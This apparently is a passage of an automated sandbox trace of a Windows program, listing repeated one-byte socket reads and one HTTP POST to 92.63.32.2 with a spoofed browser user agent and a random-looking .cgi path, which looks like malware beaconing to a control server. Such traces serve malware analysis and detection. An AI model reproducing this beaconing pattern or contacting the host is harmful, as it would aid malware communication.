Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1245, size_out = 1245 True 1
Fn
Data
Inet Read Response size = 1245, size_out = 1245 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
System Get Time type = Ticks, time = 118997 True 2
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 92.63.32.2, remote_port = 80 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 513, size_out = 513 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko True 1
Fn
Inet Open Connection protocol = http, server_name = 92.63.32.2, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /tbrelgdfl.cgi?ah=wjfq2ey&j=23t84u4&ytxn=8kk6be554 True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, Host: 92.63.32.2, Content-Type: application/x-www-form-urlencoded, Content-Length: 247, Connection: Keep-Alive, url = 92.63.32.2/tbrelgdfl.cgi?ah=wjfq2ey&j=23t84u4&ytxn=8kk6be554 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
